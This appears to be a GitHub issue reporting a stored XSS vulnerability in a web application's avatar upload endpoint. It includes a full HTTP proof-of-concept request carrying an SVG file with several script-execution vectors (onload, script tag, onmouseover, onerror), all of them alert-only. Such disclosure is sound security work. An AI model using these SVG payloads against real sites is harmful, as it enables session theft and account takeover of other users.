security vulnerability

Stored XSS (Cross-Site Scripting)
Details:
Under default configuration, after registering and logging in to the frontend, users can exploit a stored XSS vulnerability by uploading an SVG file containing malicious scripts via the file upload API.
Proof of Concept (POC):
POST /mc/setup/avatar HTTP/1.1
Host: 127.0.0.1:7001
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip, deflate, br, zstd
sec-ch-ua-mobile: ?0
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:7001/mc/setup
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Sec-Fetch-Site: same-origin
Cookie: Hm_lvt_c479407a5725732813bcd8384c174467=1747130055; HMACCOUNT=5E9A698141C3998C; EGG_SESS=l1AbkLFiL9ipmEYI3T97yatAjZkESYvX6pVit2qBmFemcEtqsfjZpn41IRnskryZtCDyzbjUXr-4YNQbI4WRfoGvG_x79JWotKyce8j__JXFJk6Q3RrOUkhUrRxKi7RoTrPKnItivwEvCRQmeS3z6JMqW7yZ9iI9nPXeDbWf47kOcGrNZcjKQ6HuUCHfk7MxQM7FGYIwqGvmWXD2Onqmj1J3Q1Y4KV9NbJTSG2PsNsj_YuTzDO4z-Y28irsSBnBaJJoQ4dzDVqctbd4gBXoFLS9ejXuq10itJgblc44vBIuPUnutnpFK9rge_m7cyFYtdgVR667aCpXwHuoaEVgGzC1pJqe7xUGTlBx25ZBFRt_aR_Uj0HguMP3rbDh2JdANP589iy-4vkGE0qdgyDAvErPWXvu0mZnkTv3gBQMWVx1SrkkEnsZ5jVDuxN6e6VW3vPnl4wFQNGBMPBcQp0WZBKRcXxvNckCvsC3zqSYLps3WJwi0Ne3tmzE5OXVKJcBfYhtDYQLl5tV2JlWKz6-3VCPfAphKZMeJGE8Q5PWmGwcbgO0je2kh48ymqRK4Mmvyi15KME5VWG8TZQdnBcaNxIWlcDbI3oprHEY0PUseK73DmFleviRgd4yHqa0YENooGRKrqa1bobNaWsuR3gnW9ojb7mneTN2q6jfVoWyGMXpBS0ltjlwXpXrC2BTpkLMWpYL6r19urKgSc2Pub8mq25h-6q0y5vAP40D-pMYUjtmFgP_XMm-Wmcz5hFPK1ngNDklBD10mZyvvdFm2cBDoq3G8Zwc7UI_E-eJp6veRavn-Zztm_Vlr0ahFlkXbYcFhtnCRXRBbfS1rbT0o7Uqq8GzYqIdnT_GI9lFcPtm-LaH8ydW9GQfZslFLlCY_lZFYB4NTr7bm97U2nv7vKuk5oRxQlL4Fc3ZMTMnhvrNkPWnx6ueZzJQgS0wR3_KlBUcYTVPYh7p1xDWlO3ISpe-35OI3cUkcPgexcW0w_5Z4dQbumbJwEru6XsvphM4bvyhoyu-d15aj1SjObXh1GqXwHdqAfD3eXrz4xvhoRpL-7RUfeSn2roiHnfkdwlOBmLWOM14aV1y0Ao0m35Tkn5B57UMBzriDEFsrHAVlxeFrKFw5pYIThBvs3dRZO-XQvBuxQtOxHsJLEgINVyEZJeb-8GNnWzdhI1pqbeDGg2nVApeL_n0i0p68Y7eJuS5qejCxWcWrfqvcfOvMkPF85YcGSiMQioqjHYXKGzkwV7QZ83GGSq9zZreZiFonwvYic58vv8kluWtZS2RKae6nNVNR4kx07n0MVRcgC-WDmmxx5J61ufwOUhWp-fOq76ufbYsSjmd9XCjujh76BetU9uAbsXdq07tcRuPNr4cDSfgRSqT05orSfoeZTGp9Dr9ltce64a0OY8YxkFYhQCklrIOCVZDuCs2vsGXJXEVqFkMuziX6sHHWwQXQw3g4FK6HQAbEnvJT49u2uS_MA3CML3KzL1AME_qf57pLguaRGg6L3wT-346xrzgRHlEa7MMqTEArdUwuUPAUf94RiEOya_iuZqCPo-s5bamaFFm8UUvgl5bJIVMm-B4QbwFKoNfnA1XuesU5wNc3MvNRvoblC8TJTUbFxYIF0gtjZ3kfGuijGL1-ZZEDyq-gx0Pa3e47LoEXWyGw1Z7mp_rPEm_0OGsYHtQHjk-r6GMeo8GgsT5zBqtNFSLJdo_LbzBCDb0DeGy7XmELFTiCeuayq_XNuUCSaxVtq-ESXHyFuaHiPnUe5C0xR6ypWrj5rFQOCFMVuviw9bAaog2nb0HEB1dSl6mtwlwUUt6Rq-2F7EYjnQeziSXrqDPAnMs5xcJvE5BDbQOLz96UNEWJ_WGfCUc2Ke3V1AkdlV6P2MryWFCUCYJ2O7vKe_Kd35VrRxCLPmDiyNrpFozRR1aONIf2FkXppPt7Q4hKimjVEobs7Xz5onC4m6S6hy7Tid4GbpnbehZtlUfwUjVsy4Umb4gpzYnTuxm89AUSG67D6MW9rcSLUpSecvE=; Hm_lpvt_c479407a5725732813bcd8384c174467=1747134694
Sec-Fetch-Mode: cors
Accept-Language: zh-CN,zh;q=0.9
sec-ch-ua-platform: "Windows"
Origin: http://127.0.0.1:7001
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoDvVdMwK1GYHq9RW
sec-ch-ua: "Chromium";v="136", "Google Chrome";v="136", "Not.A/Brand";v="99"
Accept: */*
Content-Length: 1613

------WebKitFormBoundaryoDvVdMwK1GYHq9RW
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryoDvVdMwK1GYHq9RW
Content-Disposition: form-data; name="param2"

value2
------WebKitFormBoundaryoDvVdMwK1GYHq9RW
Content-Disposition: form-data; name="ajax"

true
------WebKitFormBoundaryoDvVdMwK1GYHq9RW
Content-Disposition: form-data; name="file"; filename="111.svg"
Content-Type: image/png

<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  
  <svg onload="alert('XSS')">
    <circle cx="50" cy="50" r="45" fill="red"/>
  </svg>

  
  <svg>
    <script type="text/javascript">
      alert('XSS via script tag');
    </script>
  </svg>

  
  <svg onmouseover="alert('XSS on mouseover')">
    <rect width="100" height="100" fill="blue"/>
  </svg>

  
  <svg>
    <image onerror="alert('XSS on error')" xlink:href="invalid"/>
  </svg>
</svg> 

------WebKitFormBoundaryoDvVdMwK1GYHq9RW--

![Image](https://github.com/user-attachments/assets/8045e36b-bd70-4806-bbc8-39869b2e0c4d)

![Image](https://github.com/user-attachments/assets/71afcadb-ad8a-42b0-a83e-b6ac30555a48)

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

security vulnerability #67

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

security vulnerability #67

Description

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions